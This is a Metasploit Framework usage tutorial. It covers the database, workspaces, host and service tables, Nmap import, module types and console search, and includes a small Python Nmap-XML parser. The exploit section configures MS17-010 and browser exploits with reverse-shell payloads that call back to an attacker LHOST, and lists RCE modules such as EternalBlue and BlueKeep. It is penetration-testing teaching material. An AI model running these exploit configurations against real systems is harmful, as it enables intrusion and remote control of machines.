admin
MSF Usage: Commands, Modules, Scanning, Brute Forcing, Backdoors, Post-Exploitation
MSF is short for The Metasploit Framework. MSF is highly modular: the framework is made up of many modules. It is an open-source vulnerability exploitation and testing tool that bundles the common overflow exploits and popular shellcode for a range of platforms.
MSF directory structure
/usr/share/metasploit-framework
1. modules
2. plugins: plugins
3. tools: tools
4. msfvenom: backdoor (payload) generation
MSF database
Database operations
msfdb init # start and initialize the database
msfdb reinit # delete and reinitialize the database
msfdb delete # delete database and stop using it
msfdb start # start the database
msfdb stop # stop the database
msfdb status # check service status
msfdb run # start the database and run msfconsole
db_status:
Checks whether MSF is connected to the backend database. If it is not, run msfdb start in a terminal and then start MSF again. MSF works without a database connection, but with one, information gathered during a penetration test, such as target account and password data, can be saved.
db_rebuild_cache:
Caches all module information in the database, which makes searching through the database much faster.
db_disconnect:
Disconnect from the database.
db_connect:
By default MSF connects to the msf database in PostgreSQL. db_connect can connect to a database of your choice. To connect using a configuration file, the default database configuration file is /usr/share/metasploit-framework/config/database.yml; use it as a template.
db_nmap:
The nmap scan command integrated into MSF. The difference is that db_nmap results are saved to the database automatically.
Enter hosts to view the discovered hosts.
If there is a lot of data, filter with hosts IP; hosts -u shows only hosts that are up; hosts -c column[,column] selects the columns to show; hosts -S searches, e.g. hosts -S windows.
Enter services to view the open ports on the hosts.
creds:
View the discovered credentials
vulns:
View the discovered vulnerabilities
loot:
For some accounts we may not have obtained the plaintext password but only a hash; loot displays these.
db_export/db_import:
Database export and import
db_export -f /root/msfbak.xml
nmap output can also be imported into MSF
nmap -A 192.168.1.113 -oX nmap.xml => db_import -f /root/nmap.xml
service postgresql
Initialize
msfdb init
# msfdb init
[+] Starting database
[+] Creating database user 'msf'
[+] Creating databases 'msf'
[+] Creating databases 'msf_test'
[+] Creating configuration file '/usr/share/metasploit-framework/config/database.yml'
[+] Creating initial database schema
Start
msfdb start
# msfdb start
[i] Database already started
Confirm the connection status
db_status
msf6 > db_status
[*] Connected to msf. Connection type: postgresql.
workspace: workspaces
Metasploit has the concept of workspaces, used to isolate different penetration-testing engagements so that tests are not mixed up. The default workspace is default; enter workspace to view it.
msf6 > workspace -h
Usage:
workspace List workspaces
workspace [name] Switch workspace
OPTIONS:
-a, --add <name> Add a workspace.
-d, --delete <name> Delete a workspace.
-D, --delete-all Delete all workspaces.
-h, --help Help banner.
-l, --list List workspaces.
-r, --rename <old> <new> Rename a workspace.
-S, --search <name> Search for a workspace.
-v, --list-verbose List workspaces verbosely.
workspace -a name adds a workspace
workspace -a zoqa
[*] Added workspace: zoqa
[*] Workspace: zoqa
workspace -l lists all workspaces
msf6 > workspace -l
default
* zoqa
workspace name switches to a workspace
msf6 > workspace zoqa
[*] Workspace: zoqa
workspace -v shows workspace details
msf6 > workspace -v
Workspaces
==========
current name hosts services vulns creds loots notes
------- ---- ----- -------- ----- ----- ----- -----
default 24 0 0 0 0 0
* zoqa 0 0 0 0 0 0
hosts: host information
Usage: hosts [ options ] [addr1 addr2 ...]
OPTIONS:
-a, --add <host> Add the hosts instead of searching
-c, --columns <columns> Only show the given columns (see list below)
-C, --columns-until-restart <columns> Only show the given columns until the next restart (see list below)
-d, --delete <hosts> Delete the hosts instead of searching
-h, --help Show this help information
-i, --info <info> Change the info of a host
-m, --comment <comment> Change the comment of a host
-n, --name <name> Change the name of a host
-O, --order <column id> Order rows by specified column number
-o, --output <filename> Send output to a file in csv format
-R, --rhosts Set RHOSTS from the results of the search
-S, --search <filter> Search string to filter by
-t, --tag Add or specify a tag to a range of hosts
-u, --up Only show hosts which are up
Available columns: address, arch, comm, comments, created_at, cred_count, detected_arch, exploit_attempt_count, host_detail_count, info, mac, name, note_count, os_family, os_flavor, os_lang, os_name, os_sp, purpose, scope, service_count, state, updated_at, virtual_host, vuln_count, tags
hosts shows all host information
msf6 > hosts
Hosts
=====
address        mac                name  os_name  os_flavor  os_sp  purpose  info  comments
-------        ---                ----  -------  ---------  -----  -------  ----  --------
192.168.2.1    08:3A:38:73:31:F9
192.168.2.125  18:C0:4D:E1:AC:00
192.168.2.126  00:0c:29:b0:76:35        Linux                      server
hosts -a adds a host
msf6 > hosts -a 192.168.2.216
[*] Time: 2022-07-13 01:27:09 UTC Host: host=192.168.2.216
hosts -d deletes a host
msf6 > hosts -d 192.168.2.113
Hosts
=====
address        mac                name  os_name  os_flavor  os_sp  purpose  info  comments
-------        ---                ----  -------  ---------  -----  -------  ----  --------
192.168.2.113  18:C0:4D:C9:3A:D5
[*] Deleted 1 hosts
hosts -n / -i / -m set the name / info / comment of a host
msf6 > hosts 192.168.2.1 -i H3C
msf6 > hosts 192.168.2.1 -n h3c-gateway
msf6 > hosts 192.168.2.1 -m awesome
msf6 > hosts -v
Hosts
=====
address        mac                name         os_name  os_flavor  os_sp  purpose  info  comments
-------        ---                ----         -------  ---------  -----  -------  ----  --------
192.168.2.1    08:3A:38:73:31:F9  h3c-gateway                                      H3C   awesome
192.168.2.118  18:C0:4D:C9:3A:98
hosts -S searches
msf6 > hosts -S linux
Hosts
=====
address        mac                name  os_name  os_flavor  os_sp  purpose  info  comments
-------        ---                ----  -------  ---------  -----  -------  ----  --------
192.168.2.219  00:0c:29:b0:76:35        Linux                      server
hosts -R sets RHOSTS directly from the search results (works best combined with -S)
######################set a single host#################
msf6 auxiliary(scanner/portscan/tcp) > hosts 192.168.2.178 -R
Hosts
=====
address        mac                name  os_name  os_flavor  os_sp  purpose  info  comments
-------        ---                ----  -------  ---------  -----  -------  ----  --------
192.168.2.178  00:E0:4C:68:0D:7F
RHOSTS => 192.168.2.178
######################combined with an -S search###############
msf6 auxiliary(scanner/portscan/tcp) > hosts -S linux -R
Hosts
=====
address        mac                name  os_name  os_flavor  os_sp  purpose  info  comments
-------        ---                ----  -------  ---------  -----  -------  ----  --------
192.168.2.219  00:0c:29:b0:76:35        Linux                      server
RHOSTS => 192.168.2.219
############set multiple hosts (written to a file list)################
msf6 auxiliary(scanner/portscan/tcp) > hosts -R
Hosts
=====
address        mac                name         os_name  os_flavor  os_sp  purpose  info  comments
-------        ---                ----         -------  ---------  -----  -------  ----  --------
192.168.2.1    08:3A:38:73:31:F9  h3c-gateway                                      H3C   awesome
192.168.2.118  18:C0:4D:C9:3A:98
RHOSTS => file:/tmp/msf-db-rhosts-20220712-1736-i3se2
msf6 auxiliary(scanner/portscan/tcp) > show options
Module options (auxiliary/scanner/portscan/tcp):
Name         Current Setting                              Required  Description
----         ---------------                              --------  -----------
CONCURRENCY  10                                           yes       The number of concurrent ports to check per host
DELAY        0                                            yes       The delay between connections, per thread, in milliseconds
JITTER       0                                            yes       The delay jitter factor (maximum value by which to +/- DELAY) in milliseconds.
PORTS        1-10000                                      yes       Ports to scan (e.g. 22-25,80,110-900)
RHOSTS       file:/tmp/msf-db-rhosts-20220712-1736-i3se2  yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
THREADS      1                                            yes       The number of concurrent threads (max one per host)
TIMEOUT      1000                                         yes       The socket connect timeout in milliseconds
msf6 auxiliary(scanner/portscan/tcp) > set ports 22
ports => 22
msf6 auxiliary(scanner/portscan/tcp) > run
[*] file:/tmp/msf-db-rhosts-20220712-1736-i3se2: - Scanned 3 of 25 hosts (12% complete)
[*] file:/tmp/msf-db-rhosts-20220712-1736-i3se2: - Scanned 5 of 25 hosts (20% complete)
[*] file:/tmp/msf-db-rhosts-20220712-1736-i3se2: - Scanned 8 of 25 hosts (32% complete)
[*] file:/tmp/msf-db-rhosts-20220712-1736-i3se2: - Scanned 10 of 25 hosts (40% complete)
[+] 192.168.2.200: - 192.168.2.200:22 - TCP OPEN
[*] file:/tmp/msf-db-rhosts-20220712-1736-i3se2: - Scanned 13 of 25 hosts (52% complete)
[*] file:/tmp/msf-db-rhosts-20220712-1736-i3se2: - Scanned 15 of 25 hosts (60% complete)
[*] file:/tmp/msf-db-rhosts-20220712-1736-i3se2: - Scanned 18 of 25 hosts (72% complete)
[+] 192.168.2.216: - 192.168.2.216:22 - TCP OPEN
[+] 192.168.2.219: - 192.168.2.219:22 - TCP OPEN
[*] file:/tmp/msf-db-rhosts-20220712-1736-i3se2: - Scanned 20 of 25 hosts (80% complete)
[+] 192.168.2.228: - 192.168.2.228:22 - TCP OPEN
[+] 192.168.2.240: - 192.168.2.240:22 - TCP OPEN
[*] file:/tmp/msf-db-rhosts-20220712-1736-i3se2: - Scanned 23 of 25 hosts (92% complete)
[+] 192.168.2.241: - 192.168.2.241:22 - TCP OPEN
[+] 192.168.2.252: - 192.168.2.252:22 - TCP OPEN
[*] file:/tmp/msf-db-rhosts-20220712-1736-i3se2: - Scanned 25 of 25 hosts (100% complete)
[*] Auxiliary module execution completed
services: service information
Usage: services [-h] [-u] [-a] [-r <proto>] [-p <port1,port2>] [-s <name1,name2>] [-o <filename>] [addr1 addr2 ...]
OPTIONS:
-a, --add Add the services instead of searching.
-c, --column <col1,col2> Only show the given columns.
-d, --delete Delete the services instead of searching.
-h, --help Show this help information.
-O, --order <column id> Order rows by specified column number.
-o, --output <filename> Send output to a file in csv format.
-p, --port <ports> Search for a list of ports.
-r, --protocol <protocol> Protocol type of the service being added [tcp|udp].
-R, --rhosts Set RHOSTS from the results of the search.
-s, --name <name> Name of the service to add.
-S, --search <filter> Search string to filter by.
-u, --up Only show services which are up.
-U, --update Update data for existing service.
Available columns: created_at, info, name, port, proto, state, updated_at
services shows all service information
msf6 > services
Services
========
host           port  proto  name    state  info
----           ----  -----  ----    -----  ----
192.168.2.219  21    tcp    ftp     open   vsftpd 2.3.4
192.168.2.219  22    tcp    ssh     open   OpenSSH 4.7p1 Debian 8ubuntu1 protocol 2.0
192.168.2.219  23    tcp    telnet  open   Linux telnetd
192.168.2.219  25    tcp    smtp    open   Postfix smtpd
services -a adds a service
services -d deletes a service
services -p searches by port
msf6 > services -p 22
Services
========
host           port  proto  name  state  info
----           ----  -----  ----  -----  ----
192.168.2.200  22    tcp          open
192.168.2.216  22    tcp          open
192.168.2.219  22    tcp    ssh   open   OpenSSH 4.7p1 Debian 8ubuntu1 protocol 2.0
192.168.2.228  22    tcp          open
192.168.2.240  22    tcp          open
192.168.2.241  22    tcp          open
192.168.2.252  22    tcp          open
services -S searches the service information
msf6 > services -S mysql
Services
========
host port proto name state info
---- ---- ----- ---- ----- ----
192.168.2.219 3306 tcp mysql open MySQL 5.0.51a-3ubuntu5
services -c [columns] -S searches with several criteria at once
msf6 > services -c name,port,info -S Apache
Services
========
host name port info
---- ---- ---- ----
192.168.2.219 http 80 Apache httpd 2.2.8 (Ubuntu) DAV/2
192.168.2.219 ajp13 8009 Apache Jserv Protocol v1.3
192.168.2.219 http 8180 Apache Tomcat/Coyote JSP engine 1.1
Importing into the database
db_import [file]
Usage: db_import <filename> [file2...]
Filenames can be globs like *.xml, or **/*.xml which will search recursively
Currently supported file types include:
Acunetix
Amap Log
Amap Log -m
Appscan
Burp Session XML
Burp Issue XML
CI
Foundstone
FusionVM XML
Group Policy Preferences Credentials
IP Address List
IP360 ASPL
IP360 XML v3
Libpcap Packet Capture
Masscan XML
Metasploit PWDump Export
Metasploit XML
Metasploit Zip Export
Microsoft Baseline Security Analyzer
NeXpose Simple XML
NeXpose XML Report
Nessus NBE Report
Nessus XML (v1)
Nessus XML (v2)
NetSparker XML
Nikto XML
Nmap XML
OpenVAS Report
OpenVAS XML
Outpost24 XML
Qualys Asset XML
Qualys Scan XML
Retina XML
Spiceworks CSV Export
Wapiti XML
Importing nmap results
nmap saves its results to a file with one of:
-oN
-oX
-oS
-oG
-oA
# nmap -sP 192.168.2.0/24 -oX result.xml
Import into MSF
msf6 > db_import /root/Desktop/result.xml
[*] Importing 'Nmap XML' data
[*] Import: Parsing with 'Nokogiri v1.13.4'
[*] Importing host 192.168.2.1
[*] Importing host 192.168.2.113
[*] Importing host 192.168.2.118
[*] Successfully imported /root/Desktop/result.xml
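As an added example (not Metasploit's own importer), the following Python reads the Nmap -oX schema that db_import parses above and turns it into rows shaped like the hosts and services tables shown earlier; parse_nmap_xml, search_services (which mimics services -S) and format_services are hypothetical helper names, and the embedded XML is constructed sample data.

```python
"""Parse Nmap -oX output into the host/service rows db_import stores.

Added example (not Metasploit's own importer): it reads the Nmap XML
schema and produces rows shaped like msfconsole's `hosts` and `services`
tables. SAMPLE_NMAP_XML is constructed sample data, not a real scan.
"""
import xml.etree.ElementTree as ET

# Constructed sample in the real Nmap -oX schema: one host that is up with
# two open ports and one closed port, and one host that is down.
SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sS -sV 192.168.2.219" start="1657760000">
  <host>
    <status state="up" reason="arp-response"/>
    <address addr="192.168.2.219" addrtype="ipv4"/>
    <address addr="00:0C:29:B0:76:35" addrtype="mac"/>
    <ports>
      <port protocol="tcp" portid="21">
        <state state="open" reason="syn-ack"/>
        <service name="ftp" product="vsftpd" version="2.3.4"/>
      </port>
      <port protocol="tcp" portid="22">
        <state state="open" reason="syn-ack"/>
        <service name="ssh" product="OpenSSH" version="4.7p1 Debian 8ubuntu1"/>
      </port>
      <port protocol="tcp" portid="23">
        <state state="closed" reason="reset"/>
      </port>
    </ports>
  </host>
  <host>
    <status state="down" reason="no-response"/>
    <address addr="192.168.2.220" addrtype="ipv4"/>
  </host>
</nmaprun>
"""


def parse_nmap_xml(xml_text):
    """Return (hosts, services) lists shaped like the `hosts`/`services` tables."""
    root = ET.fromstring(xml_text)
    if root.tag != "nmaprun":
        raise ValueError("not an Nmap XML document (root element is %r)" % root.tag)
    hosts, services = [], []
    for host in root.findall("host"):
        status = host.find("status")
        state = status.get("state") if status is not None else "unknown"
        ipv4 = mac = None
        for addr in host.findall("address"):
            if addr.get("addrtype") == "ipv4":
                ipv4 = addr.get("addr")
            elif addr.get("addrtype") == "mac":
                mac = addr.get("addr")
        if ipv4 is None:  # skip hosts without an IPv4 address
            continue
        hosts.append({"address": ipv4, "mac": mac, "state": state})
        for port in host.findall("./ports/port"):
            pstate = port.find("state")
            svc = port.find("service")
            # The `info` column is product + version, e.g. "vsftpd 2.3.4".
            info = ""
            if svc is not None:
                info = " ".join(v for v in (svc.get("product"), svc.get("version")) if v)
            services.append({
                "host": ipv4,
                "port": int(port.get("portid")),
                "proto": port.get("protocol"),
                "name": svc.get("name") if svc is not None else "",
                "state": pstate.get("state") if pstate is not None else "unknown",
                "info": info,
            })
    return hosts, services


def search_services(services, needle):
    """Mimic `services -S <filter>`: case-insensitive match on name or info."""
    needle = needle.lower()
    return [s for s in services
            if needle in s["name"].lower() or needle in s["info"].lower()]


def format_services(services):
    """Render rows in the column layout msfconsole prints for `services`."""
    lines = ["host            port   proto  name     state   info",
             "----            ----   -----  ----     -----   ----"]
    for s in services:
        lines.append("%-15s %-6d %-6s %-8s %-7s %s" % (
            s["host"], s["port"], s["proto"], s["name"], s["state"], s["info"]))
    return "\n".join(lines)


if __name__ == "__main__":
    hosts, services = parse_nmap_xml(SAMPLE_NMAP_XML)
    print("%d hosts, %d services" % (len(hosts), len(services)))
    print(format_services(search_services(services, "ssh")))
```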
MSF modules
By default MSF stores its modules in the following directory
/usr/share/metasploit-framework/modules/
cd /usr/share/metasploit-framework/
msf6 > ls
[*] exec: ls
app lib msfrpc ruby
config metasploit-framework.gemspec msfrpcd script-exploit
data modules msfupdate script-password
db msfconsole msfvenom script-recon
documentation msfd msf-ws.ru scripts
Gemfile msfdb plugins tools
Gemfile.lock msf-json-rpc.ru Rakefile vendor
##############################module directory#######################
cd modules/
msf6 > ls
[*] exec: ls
auxiliary encoders evasion exploits nops payloads post
######################auxiliary modules#########################
msf6 > cd auxiliary/
msf6 > ls
[*] exec: ls
admin client docx example.rb gather scanner spoof vsploit
analyze cloud dos fileformat parser server sqli
bnat crawler example.py fuzzers pdf sniffer voip
########################dos-related###############################
msf6 > cd dos
msf6 > ls
[*] exec: ls
android dhcp hp misc rpc scada solaris tcp wireshark
apple_ios dns http ntp samba smb ssl upnp
cisco freebsd mdns pptp sap smtp syslog windows
###########################Windows-related########################
msf6 > cd windows
msf6 > ls
[*] exec: ls
appian browser ftp games http llmnr nat rdp smb smtp ssh tftp
#########################ftp scripts##############################
msf6 > cd ftp
msf6 > ls
[*] exec: ls
filezilla_admin_user.rb iis_list_exhaustion.rb winftp230_nlst.rb
filezilla_server_port.rb solarftp_user.rb xmeasy560_nlst.rb
guildftp_cwdlist.rb titan626_site.rb xmeasy570_nlst.rb
iis75_ftpd_iac_bof.rb vicftps50_list.rb
MSF's module types correspond to the subdirectories listed above:
(1) auxiliary: helper modules for information gathering, enumeration, fingerprinting, scanning and similar tasks
(2) encoders: modules that encode the payload to evade AV detection
(3) evasion: modules for evading detection
(4) exploits: /usr/share/metasploit-framework/modules/exploits holds the exploit code used in attacks
(5) nops: improve payload stability and keep its size constant
(6) payloads: three kinds of payload
  singles: all-in-one payloads that carry every function themselves and therefore take more space
  stagers: when the target has limited memory, a small payload is sent first to set up the connection
  stages: downloaded over the connection the stager set up
(7) post: post-exploitation modules
auxiliary
Helper modules responsible for information gathering, scanning, sniffing, fingerprinting, password guessing, DoS and similar tasks
exploits
Actions that attack a system through a vulnerability; each module corresponds to the attack method (active or passive) for one specific vulnerability
payloads
The code or instructions that actually run on the target after a successful exploit. There are three kinds of payload: single, stages and stagers. Shellcode is a special payload used to obtain a shell.
- single: all-in-one. A complete, self-contained payload with no dependency on external libraries or packages.
- stagers: when the target has limited memory, a small payload is sent first to set up the connection
- stages: downloaded over the connection the stagers set up
encoders
Modules that encode the payload to evade AntiVirus detection
nops
Improve payload stability and keep its size constant. When building the malicious buffer for an exploit, a run of no-op instructions is usually placed before the shellcode that is actually executed, so that when execution jumps to the shellcode after the exploit triggers there is a wide landing zone. This avoids shellcode failures caused by address-space randomization, return-address miscalculation and the like, and makes the exploit more reliable.
post
Post-exploitation modules. After remote control of the target has been obtained, these perform follow-on actions such as harvesting sensitive information and pivoting.
Exploit modules
############################Exploit modules###############################
msf6 > cd exploits/
msf6 > ls
[*] exec: ls
aix dialup firefox mainframe qnx
android example_linux_priv_esc.rb freebsd multi solaris
apple_ios example.py hpux netware unix
bsd example.rb irix openbsd windows
bsdi example_webapp.rb linux osx
###############################Linux-related###############################
msf6 > cd linux
msf6 > ls
[*] exec: ls
antivirus games imap mysql pptp samba ssh
browser http local pop3 proxy smtp telnet
ftp ids misc postgres redis snmp upnp
###############################ssh scripts##################################
msf6 > cd ssh
msf6 > ls
[*] exec: ls
ceragon_fibeair_known_privkey.rb
cisco_ucs_scpuser.rb
exagrid_known_privkey.rb
f5_bigip_known_privkey.rb
ibm_drm_a3user.rb
loadbalancerorg_enterprise_known_privkey.rb
mercurial_ssh_exec.rb
microfocus_obr_shrboadmin.rb
quantum_dxi_known_privkey.rb
quantum_vmpro_backdoor.rb
solarwinds_lem_exec.rb
symantec_smg_ssh.rb
vmware_vdp_known_privkey.rb
vyos_restricted_shell_privesc.rb
Exploits are divided into Active Exploits and Passive Exploits
Active Exploit
(Active attack, mostly server-side vulnerabilities; the payload is sent to the port the target server listens on.) This is a direct attack: it works when no firewall is in the way and fails when one is.
The target exposes a service, and that service is vulnerable
- use exploit/windows/smb/ms17_010_psexec
- set RHOST 192.168.1.100
- set PAYLOAD windows/shell/reverse_tcp
- set LHOST 192.168.1.1
- set LPORT 4444
- set SMBUSER user1
- set SMBPASS pass1
- exploit
Passive Exploit
(Passive attack, mostly client-side programs.) Here we set a trap and wait for the target to take the bait; it works against targets behind a firewall, combined with social engineering.
The victim usually has no open ports, or the services on its open ports are not vulnerable; the vulnerability is in client software on the victim's machine. The client needs to access a service on some remote server. When exploit code has been placed on that server and the client program is vulnerable, the server returns the exploit code in its response and the client-side vulnerability is triggered.
- use exploit/windows/browser/ms07_017_ani_loadimage_chunksize
- set URIPATH /
- set PAYLOAD windows/shell/reverse_tcp
- set LHOST 192.168.1.1
- set PORT 4444
- exploit
msfconsole
The console supports TAB completion and running external (system) commands
Core commands
Core Commands
=============
Command Description
------- -----------
? Help menu
banner Display an awesome metasploit banner
cd Change the current working directory
color Toggle color
connect Communicate with a host
debug Display information useful for debugging
exit Exit the console
features Display the list of not yet released features that can be opted in to
get Gets the value of a context-specific variable
getg Gets the value of a global variable
grep Grep the output of another command
help Help menu
history Show command history
load Load a framework plugin
quit Exit the console
repeat Repeat a list of commands
route Route traffic through a session
save Saves the active datastores
sessions Dump session listings and display information about sessions
set Sets a context-specific variable to a value
setg Sets a global variable to a value
sleep Do nothing for the specified number of seconds
spool Write console output into a file as well the screen
threads View and manipulate background threads
tips Show a list of useful productivity tips
unload Unload a framework plugin
unset Unsets one or more context-specific variables
unsetg Unsets one or more global variables
version Show the framework and console library version numbers
Module commands
Module Commands
===============
Command Description
------- -----------
advanced Displays advanced options for one or more modules
back Move back from the current context
clearm Clear the module stack
favorite Add module(s) to the list of favorite modules
info Displays information about one or more modules
listm List the module stack
loadpath Searches for and loads modules from a path
options Displays global options or for one or more modules
popm Pops the latest module off the stack and makes it active
previous Sets the previously loaded module as the current module
pushm Pushes the active or list of modules onto the module stack
reload_all Reloads all modules from all defined module paths
search Searches module names and descriptions
show Displays modules of a given type, or all modules
use Interact with a module by name or search term/index
Job commands
Job Commands
============
Command Description
------- -----------
handler Start a payload handler as job
jobs Displays and manages jobs
kill Kill a job
rename_job Rename a job
run/exploit -j runs in the background
jobs lists all jobs
Common commands
help or ?:
Shows the commands available in msfconsole. help <command> shows the usage of a particular command.
connect:
Can be thought of as MSF's nc command; connect -h shows detailed usage.
connect [options] <host> <port>
show:
Use show to list the resources MSF provides. Run from the top level it can take a while, because some module types contain many modules.
show exploits: list the available exploits
Besides exploits, it also accepts all, encoders, nops, exploits, payloads, auxiliary, post, plugins, info, options. Some options only work after selecting a module with use, for example show targets.
search:
Search for modules
Simple search: search ms17_010
Narrow the results with several criteria: search name:mysql type:exploit platform:linux
info:
View a module's information
info <module name>
If a module has been selected with use, just enter info
use:
After finding a module with search, select it with use
use exploit/windows/smb/ms08_067_netapi
After selecting a module with use, show options lists the settings to configure, show targets selects the target system, show payloads selects a payload, show advanced lists the advanced parameters, and show evasion lists the modules available for obfuscation and evasion.
set/setg:
Set parameters such as the target host IP, the payload, etc. show missing lists the parameters that have not been set yet.
setg sets a global variable, so the same parameter does not have to be entered for every module.
unset/unsetg:
Clear a parameter. unsetg clears a global variable.
save:
Parameters are not kept across restarts; save stores the settings made during the session.
check:
Checks whether the target really has the vulnerability; most modules do not support check.
back:
Return to the msfconsole top level
run or exploit:
Start the module
run/exploit -j: run in the background
jobs:
Show running and background jobs
sessions:
List the sessions that have been established, i.e. the shells obtained
sessions -i id interacts with a session
load/unload:
Load external scanning tools, for example openvas
loadpath:
Load your own modules
route:
Add a route, for example so that traffic to a subnet is sent through a compromised machine.
banner: display the banner
search
Search by name, author, CVE ID, port, platform, ...
Usage: search [<options>] [<keywords>:<value>]
Prepending a value with '-' will exclude any matching results.
If no options or keywords are provided, cached results are displayed.
OPTIONS:
-h, --help Help banner
-I, --ignore Ignore the command if the only match has the same name as the search
-o, --output <filename> Send output to a file in csv format
-r, --sort-descending <column> Reverse the order of search results to descending order
-S, --filter <filter> Regex pattern used to filter search results
-s, --sort-ascending <column> Sort search results by the specified column in ascending order
-u, --use Use module if there is one result
Keywords:
aka : Modules with a matching AKA (also-known-as) name
author : Modules written by this author
arch : Modules affecting this architecture
bid : Modules with a matching Bugtraq ID
cve : Modules with a matching CVE ID
edb : Modules with a matching Exploit-DB ID
check : Modules that support the 'check' method
date : Modules with a matching disclosure date
description : Modules with a matching description
fullname : Modules with a matching full name
mod_time : Modules with a matching modification date
name : Modules with a matching descriptive name
path : Modules with a matching path
platform : Modules affecting this platform
port : Modules with a matching port
rank : Modules with a matching rank (Can be descriptive (ex: 'good') or numeric with comparison operators (ex: 'gte400'))
ref : Modules with a matching ref
reference : Modules with a matching reference
target : Modules affecting this target
type : Modules of a specific type (exploit, payload, auxiliary, encoder, evasion, post, or nop)
Supported search columns:
rank : Sort modules by their exploitabilty rank
date : Sort modules by their disclosure date. Alias for disclosure_date
disclosure_date : Sort modules by their disclosure date
name : Sort modules by their name
type : Sort modules by their type
check : Sort modules by whether or not they have a check method
Examples:
search cve:2009 type:exploit
search cve:2009 type:exploit platform:-linux
search cve:2009 -s name
search type:exploit -s type -r
rank indicates how reliable a module is: normal, excellent, good, average
Search directly by keyword
msf6 > search ms17-010
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
1 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
2 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
3 auxiliary/scanner/smb/smb_ms17_010 normal No MS17-010 SMB RCE Detection
4 exploit/windows/smb/smb_doublepulsar_rce 2017-04-14 great Yes SMB DOUBLEPULSAR Remote Code Execution
Interact with a module by name or index. For example info 4, use 4 or use exploit/windows/smb/smb_doublepulsar_rce
Search by type: search type:[exploit, auxiliary, ...]
msf6 > search mysql type:exploit
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/http/cayin_xpost_sql_rce 2020-06-04 excellent Yes Cayin xPost wayfinder_seqid SQLi to RCE
1 exploit/unix/webapp/kimai_sqli 2013-05-21 average Yes Kimai v0.9.2 'db_restore.php' SQL Injection
2 exploit/linux/http/librenms_collectd_cmd_inject 2019-07-15 excellent Yes LibreNMS Collectd Command Injection
3 exploit/multi/http/manage_engine_dc_pmp_sqli 2014-06-08 excellent Yes ManageEngine Desktop Central / Password Manager LinkViewFetchServlet.dat SQL Injection
Search by port: search port:3389
msf6 > search port:3389
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/rdp/cve_2019_0708_bluekeep 2019-05-14 normal Yes CVE-2019-0708 BlueKeep Microsoft Remote Desktop RCE Check
1 exploit/windows/rdp/cve_2019_0708_bluekeep_rce 2019-05-14 manual Yes CVE-2019-0708 BlueKeep RDP Remote Windows Kernel Use After Free
2 auxiliary/scanner/rdp/rdp_scanner normal No Identify endpoints speaking the Remote Desktop Protocol (RDP)
3 auxiliary/scanner/rdp/ms12_020_check normal Yes MS12-020 Microsoft Remote Desktop Checker
4 auxiliary/dos/windows/rdp/ms12_020_maxchannelids 2012-03-16 normal No MS12-020 Microsoft Remote Desktop Use-After-Free DoS
5 exploit/windows/rdp/rdp_doublepulsar_rce 2017-04-14 great Yes RDP DOUBLEPULSAR Remote Code Execution
Search by CVE ID: search cve:2020
msf6 > search cve:2020
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/multi/http/apache_apisix_api_default_token_rce 2020-12-07 excellent Yes APISIX Admin API default access token RCE
1 exploit/unix/webapp/aerohive_netconfig_lfi_log_poison_rce 2020-02-17 excellent Yes Aerohive NetConfig 10.0r8a LFI and log poisoning to RCE
2 exploit/linux/misc/aerospike_database_udf_cmd_exec 2020-07-31 great Yes Aerospike Database UDF Lua Code Execution
3 exploit/linux/misc/cve_2020_13160_anydesk 2020-06-16 normal Yes AnyDesk GUI Format String Write
Combined search: search cve:2020 type:exploit
msf6 > search cve:2020 type:exploit
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/multi/http/apache_apisix_api_default_token_rce 2020-12-07 excellent Yes APISIX Admin API default access token RCE
1 exploit/unix/webapp/aerohive_netconfig_lfi_log_poison_rce 2020-02-17 excellent Yes Aerohive NetConfig 10.0r8a LFI and log poisoning to RCE
2 exploit/linux/misc/aerospike_database_udf_cmd_exec 2020-07-31 great Yes Aerospike Database UDF Lua Code Execution
3 exploit/linux/misc/cve_2020_13160_anydesk 2020-06-16 normal Yes AnyDesk GUI Format String Write
show
all, encoders, nops, exploits, payloads, auxiliary, post, plugins, info, options, favorites
show options displays the configurable settings
msf6 auxiliary(scanner/ssh/ssh_enumusers) > show options
Module options (auxiliary/scanner/ssh/ssh_enumusers):
Name Current Setting Required Description
---- --------------- -------- -----------
CHECK_FALSE false no Check for false positives (random username)
DB_ALL_USERS false no Add all users in the current database to the list
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 22 yes The target port
THREADS 1 yes The number of concurrent threads (max one per host)
THRESHOLD 10 yes Amount of seconds needed before a user is considered found (timing attack only)
USERNAME no Single username to test (username spray)
USER_FILE no File containing usernames, one per line
info / show info displays module information
msf6 auxiliary(scanner/ssh/ssh_enumusers) > show info
Name: SSH Username Enumeration
Module: auxiliary/scanner/ssh/ssh_enumusers
License: Metasploit Framework License (BSD)
Rank: Normal
Provided by:
kenkeiras
Dariusz Tytko
Michal Sajdak
Qualys
wvu <wvu@metasploit.com>
Module side effects:
ioc-in-logs
account-lockouts
Module reliability:
crash-service-down
Available actions:
Name Description
---- -----------
Malformed Packet Use a malformed packet
Timing Attack Use a timing attack
Check supported:
No
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
CHECK_FALSE false no Check for false positives (random username)
DB_ALL_USERS false no Add all users in the current database to the list
set / unset / setg / unsetg: set or clear a parameter, set or clear a global parameter
msf6 auxiliary(scanner/ssh/ssh_enumusers) > set user_file /root/Desktop/username.txt
user_file => /root/Desktop/username.txt
msf6 auxiliary(scanner/ssh/ssh_enumusers) > unset username
Unsetting username...
